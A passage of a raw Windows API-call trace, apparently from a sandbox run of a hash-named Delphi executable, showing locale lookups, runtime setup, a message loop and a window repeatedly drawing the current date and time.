lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0103.964] GetVersion () returned 0x23f00206 [0103.964] GetVersion () returned 0x23f00206 [0103.964] GetCurrentThreadId () returned 0x13b0 [0103.964] GetModuleFileNameA (in: hModule=0x2330000, lpFilename=0x19e784, nSize=0x105 | out: lpFilename="") returned 0x0 [0103.964] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x19e65b, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f28fc7b2cb76f0a714ef1e43b37ec0f5aa6c497d25d7de4379e8e0b91913d1c0.exe")) returned 0x62 [0103.964] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19e774 | out: phkResult=0x19e774*=0x0) returned 0x2 [0103.965] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19e774 | out: phkResult=0x19e774*=0x0) returned 0x2 [0103.965] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x19e774 | out: phkResult=0x19e774*=0x0) returned 0x2 [0103.965] lstrcpynA (in: lpString1=0x19e65b, lpString2="", iMaxLength=261 | out: lpString1="") returned="" [0103.965] GetThreadLocale () returned 0x409 [0103.965] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x19e76f, cchData=5 | out: lpLCData="ENU") returned 4 [0103.966] LoadStringA (in: hInstance=0x2330000, uID=0xffdf, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.975] LoadStringA (in: hInstance=0x2330000, uID=0xffde, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.975] LoadStringA (in: hInstance=0x2330000, uID=0xffdc, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.976] LoadStringA (in: hInstance=0x2330000, uID=0xffdd, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.976] LoadStringA (in: hInstance=0x2330000, uID=0xffd0, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.977] LoadStringA (in: hInstance=0x2330000, uID=0xffd8, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.977] LoadStringA (in: hInstance=0x2330000, uID=0xffef, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.978] LoadStringA (in: hInstance=0x2330000, uID=0xffec, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.978] LoadStringA (in: hInstance=0x2330000, uID=0xffd3, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.979] LoadStringA (in: hInstance=0x2330000, uID=0xffd2, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.979] LoadStringA (in: hInstance=0x2330000, uID=0xffe5, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.980] LoadStringA (in: hInstance=0x2330000, uID=0xffe6, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.981] LoadStringA (in: hInstance=0x2330000, uID=0xffe7, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.981] LoadStringA (in: hInstance=0x2330000, uID=0xffe4, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.982] LoadStringA (in: hInstance=0x2330000, uID=0xffe2, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.983] LoadStringA (in: hInstance=0x2330000, uID=0xffe0, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.983] LoadStringA (in: hInstance=0x2330000, uID=0xffff, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.984] LoadStringA (in: hInstance=0x2330000, uID=0xfffe, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.984] LoadStringA (in: hInstance=0x2330000, uID=0xfffd, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.985] LoadStringA (in: hInstance=0x2330000, uID=0xfffc, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.985] LoadStringA (in: hInstance=0x2330000, uID=0xfffb, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.986] LoadStringA (in: hInstance=0x2330000, uID=0xfffa, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.986] LoadStringA (in: hInstance=0x2330000, uID=0xfff9, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.987] LoadStringA (in: hInstance=0x2330000, uID=0xfff8, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.987] LoadStringA (in: hInstance=0x2330000, uID=0xfff7, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.988] LoadStringA (in: hInstance=0x2330000, uID=0xfff6, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.988] LoadStringA (in: hInstance=0x2330000, uID=0xfff5, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.989] LoadStringA (in: hInstance=0x2330000, uID=0xfff4, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.989] LoadStringA (in: hInstance=0x2330000, uID=0xfff3, lpBuffer=0x19e8b8, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.990] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x68aa58 [0103.990] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x3f70000 [0103.991] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x68ba58 [0103.991] VirtualAlloc (lpAddress=0x3f70000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x3f70000 [0103.991] LoadStringA (in: hInstance=0x2330000, uID=0xfff1, lpBuffer=0x19e8a4, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.992] LoadStringA (in: hInstance=0x2330000, uID=0xffe1, lpBuffer=0x19e8a4, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0103.992] GetVersionExA (in: lpVersionInformation=0x19f83c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x3f70004, dwMinorVersion=0x3f70000, dwBuildNumber=0x0, dwPlatformId=0x19f884, szCSDVersion="0v4\x02\x11") | out: lpVersionInformation=0x19f83c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0103.993] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76720000 [0103.993] GetProcAddress (hModule=0x76720000, lpProcName="GetDiskFreeSpaceExA") returned 0x767469d0 [0103.993] GetThreadLocale () returned 0x409 [0103.993] GetThreadLocale () returned 0x409 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x19f714, cchData=256 | out: lpLCData="Jan") returned 4 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x19f714, cchData=256 | out: lpLCData="January") returned 8 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x19f714, cchData=256 | out: lpLCData="Feb") returned 4 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x19f714, cchData=256 | out: lpLCData="February") returned 9 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x19f714, cchData=256 | out: lpLCData="Mar") returned 4 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x19f714, cchData=256 | out: lpLCData="March") returned 6 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x19f714, cchData=256 | out: lpLCData="Apr") returned 4 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x19f714, cchData=256 | out: lpLCData="April") returned 6 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x19f714, cchData=256 | out: lpLCData="May") returned 4 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x19f714, cchData=256 | out: lpLCData="May") returned 4 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x19f714, cchData=256 | out: lpLCData="Jun") returned 4 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x19f714, cchData=256 | out: lpLCData="June") returned 5 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x19f714, cchData=256 | out: lpLCData="Jul") returned 4 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x19f714, cchData=256 | out: lpLCData="July") returned 5 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x19f714, cchData=256 | out: lpLCData="Aug") returned 4 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x19f714, cchData=256 | out: lpLCData="August") returned 7 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x19f714, cchData=256 | out: lpLCData="Sep") returned 4 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x19f714, cchData=256 | out: lpLCData="September") returned 10 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x19f714, cchData=256 | out: lpLCData="Oct") returned 4 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x19f714, cchData=256 | out: lpLCData="October") returned 8 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x19f714, cchData=256 | out: lpLCData="Nov") returned 4 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x19f714, cchData=256 | out: lpLCData="November") returned 9 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x19f714, cchData=256 | out: lpLCData="Dec") returned 4 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x19f714, cchData=256 | out: lpLCData="December") returned 9 [0103.993] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x19f714, cchData=256 | out: lpLCData="Sun") returned 4 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x19f714, cchData=256 | out: lpLCData="Sunday") returned 7 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x19f714, cchData=256 | out: lpLCData="Mon") returned 4 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x19f714, cchData=256 | out: lpLCData="Monday") returned 7 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x19f714, cchData=256 | out: lpLCData="Tue") returned 4 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x19f714, cchData=256 | out: lpLCData="Tuesday") returned 8 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x19f714, cchData=256 | out: lpLCData="Wed") returned 4 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x19f714, cchData=256 | out: lpLCData="Wednesday") returned 10 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x19f714, cchData=256 | out: lpLCData="Thu") returned 4 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x19f714, cchData=256 | out: lpLCData="Thursday") returned 9 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x19f714, cchData=256 | out: lpLCData="Fri") returned 4 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x19f714, cchData=256 | out: lpLCData="Friday") returned 7 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x19f714, cchData=256 | out: lpLCData="Sat") returned 4 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x19f714, cchData=256 | out: lpLCData="Saturday") returned 9 [0103.994] GetThreadLocale () returned 0x409 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x19f770, cchData=256 | out: lpLCData="$") returned 2 [0103.994] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x19f770, cchData=256 | out: lpLCData="0") returned 2 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x19f770, cchData=256 | out: lpLCData="0") returned 2 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x19f868, cchData=2 | out: lpLCData=",") returned 2 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x19f868, cchData=2 | out: lpLCData=".") returned 2 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x19f770, cchData=256 | out: lpLCData="2") returned 2 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x19f868, cchData=2 | out: lpLCData="/") returned 2 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x19f770, cchData=256 | out: lpLCData="M/d/yyyy") returned 9 [0103.995] GetThreadLocale () returned 0x409 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x19f73c, cchData=256 | out: lpLCData="1") returned 2 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x19f770, cchData=256 | out: lpLCData="dddd, MMMM d, yyyy") returned 19 [0103.995] GetThreadLocale () returned 0x409 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x19f73c, cchData=256 | out: lpLCData="1") returned 2 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x19f868, cchData=2 | out: lpLCData=":") returned 2 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x19f770, cchData=256 | out: lpLCData="AM") returned 3 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x19f770, cchData=256 | out: lpLCData="PM") returned 3 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x19f770, cchData=256 | out: lpLCData="0") returned 2 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x19f770, cchData=256 | out: lpLCData="0") returned 2 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x19f770, cchData=256 | out: lpLCData="0") returned 2 [0103.995] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x19f868, cchData=2 | out: lpLCData=",") returned 2 [0103.996] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x76680000 [0103.996] GetProcAddress (hModule=0x76680000, lpProcName="VariantChangeTypeEx") returned 0x76697260 [0103.996] GetProcAddress (hModule=0x76680000, lpProcName="VarNeg") returned 0x766e2470 [0103.996] GetProcAddress (hModule=0x76680000, lpProcName="VarNot") returned 0x766e36e0 [0103.996] GetProcAddress (hModule=0x76680000, lpProcName="VarAdd") returned 0x766bcbb0 [0103.996] GetProcAddress (hModule=0x76680000, lpProcName="VarSub") returned 0x766be0d0 [0103.997] GetProcAddress (hModule=0x76680000, lpProcName="VarMul") returned 0x766bd800 [0103.997] GetProcAddress (hModule=0x76680000, lpProcName="VarDiv") returned 0x766e2980 [0103.997] GetProcAddress (hModule=0x76680000, lpProcName="VarIdiv") returned 0x766e3320 [0103.998] GetProcAddress (hModule=0x76680000, lpProcName="VarMod") returned 0x766e3580 [0103.998] GetProcAddress (hModule=0x76680000, lpProcName="VarAnd") returned 0x766b3690 [0103.998] GetProcAddress (hModule=0x76680000, lpProcName="VarOr") returned 0x766e3790 [0103.998] GetProcAddress (hModule=0x76680000, lpProcName="VarXor") returned 0x766e3930 [0103.998] GetProcAddress (hModule=0x76680000, lpProcName="VarCmp") returned 0x76692ae0 [0103.998] GetProcAddress (hModule=0x76680000, lpProcName="VarI4FromStr") returned 0x76695140 [0103.998] GetProcAddress (hModule=0x76680000, lpProcName="VarR4FromStr") returned 0x766b3020 [0103.998] GetProcAddress (hModule=0x76680000, lpProcName="VarR8FromStr") returned 0x766b3cd0 [0103.999] GetProcAddress (hModule=0x76680000, lpProcName="VarDateFromStr") returned 0x766a8b20 [0103.999] GetProcAddress (hModule=0x76680000, lpProcName="VarCyFromStr") returned 0x76692280 [0103.999] GetProcAddress (hModule=0x76680000, lpProcName="VarBoolFromStr") returned 0x766944d0 [0103.999] GetProcAddress (hModule=0x76680000, lpProcName="VarBstrFromCy") returned 0x766b31c0 [0103.999] GetProcAddress (hModule=0x76680000, lpProcName="VarBstrFromDate") returned 0x766a99f0 [0103.999] GetProcAddress (hModule=0x76680000, lpProcName="VarBstrFromBool") returned 0x76694480 [0104.001] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x274 [0104.001] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x278 [0104.001] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x27c [0104.002] timeSetEvent (uDelay=0x2328, uResolution=0x0, fptc=0x2345128, dwUser=0x0, fuEvent=0x1) returned 0x10 [0104.006] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.007] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.007] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.007] NtdllDefWindowProc_A (hWnd=0x8023e, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0104.007] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.007] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.007] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.007] CallWindowProcA (lpPrevWndFunc=0x407710, hWnd=0x402fa, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0104.008] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.008] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.008] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.008] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x2ed)) [0104.008] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x2ed)) [0104.009] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0104.009] GetDC (hWnd=0x0) returned 0xa0100d0 [0104.009] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0104.009] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0104.009] GetSysColor (nIndex=8) returned 0x0 [0104.010] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0104.010] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0104.010] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0104.010] UnrealizeObject (h=0x2d10099f) returned 1 [0104.010] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0104.010] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0104.010] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0104.010] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:49:33 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:49:33 PM", lprc=0x19f5bd) returned 13 [0104.012] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0104.012] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0104.012] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0104.012] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0104.012] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0104.012] IntersectRect (in: lprcDst=0x19f55f, lprcSrc1=0x19f584, lprcSrc2=0x19f54c | out: lprcDst=0x19f55f) returned 0 [0104.012] EqualRect (lprc1=0x19f55f, lprc2=0x19f584) returned 0 [0104.013] IntersectRect (in: lprcDst=0x19f55f, lprcSrc1=0x19f584, lprcSrc2=0x19f54c | out: lprcDst=0x19f55f) returned 0 [0104.013] EqualRect (lprc1=0x19f55f, lprc2=0x19f584) returned 0 [0104.013] IntersectRect (in: lprcDst=0x19f55f, lprcSrc1=0x19f584, lprcSrc2=0x19f54c | out: lprcDst=0x19f55f) returned 0 [0104.013] EqualRect (lprc1=0x19f55f, lprc2=0x19f584) returned 0 [0104.013] IntersectRect (in: lprcDst=0x19f55f, lprcSrc1=0x19f584, lprcSrc2=0x19f54c | out: lprcDst=0x19f55f) returned 0 [0104.013] EqualRect (lprc1=0x19f55f, lprc2=0x19f584) returned 0 [0104.013] IntersectRect (in: lprcDst=0x19f55f, lprcSrc1=0x19f584, lprcSrc2=0x19f54c | out: lprcDst=0x19f55f) returned 0 [0104.013] EqualRect (lprc1=0x19f55f, lprc2=0x19f584) returned 0 [0104.013] IntersectRect (in: lprcDst=0x19f55f, lprcSrc1=0x19f584, lprcSrc2=0x19f54c | out: lprcDst=0x19f55f) returned 0 [0104.013] EqualRect (lprc1=0x19f55f, lprc2=0x19f584) returned 0 [0104.013] IntersectRect (in: lprcDst=0x19f55f, lprcSrc1=0x19f584, lprcSrc2=0x19f54c | out: lprcDst=0x19f55f) returned 0 [0104.013] EqualRect (lprc1=0x19f55f, lprc2=0x19f584) returned 0 [0104.013] IntersectRect (in: lprcDst=0x19f55f, lprcSrc1=0x19f584, lprcSrc2=0x19f54c | out: lprcDst=0x19f55f) returned 0 [0104.013] EqualRect (lprc1=0x19f55f, lprc2=0x19f584) returned 0 [0104.013] IntersectRect (in: lprcDst=0x19f55f, lprcSrc1=0x19f584, lprcSrc2=0x19f54c | out: lprcDst=0x19f55f) returned 0 [0104.013] EqualRect (lprc1=0x19f55f, lprc2=0x19f584) returned 0 [0104.013] InvalidateRect (hWnd=0x402fa, lpRect=0x19f584, bErase=1) returned 1 [0104.013] InvalidateRect (hWnd=0x402fa, lpRect=0x19f580, bErase=0) returned 1 [0104.013] IsIconic (hWnd=0x402fa) returned 0 [0104.013] GetClientRect (in: hWnd=0x402fa, lpRect=0x19f580 | out: lpRect=0x19f580) returned 1 [0104.013] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.021] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.021] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.021] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x2fa)) [0104.022] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x2fa)) [0104.022] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.029] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.029] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.029] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x302)) [0104.029] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x302)) [0104.030] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.053] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.053] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.053] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x31a)) [0104.053] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x31a)) [0104.053] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.063] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.063] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.063] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x324)) [0104.063] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x324)) [0104.064] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.075] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.075] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.075] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x32f)) [0104.075] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x330)) [0104.075] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.095] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.095] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.095] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x344)) [0104.095] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x344)) [0104.096] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0104.107] TranslateMessage (lpMsg=0x2347a14) returned 0 [0104.107] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0104.107] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x21, wMilliseconds=0x350)) [0104.108] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, 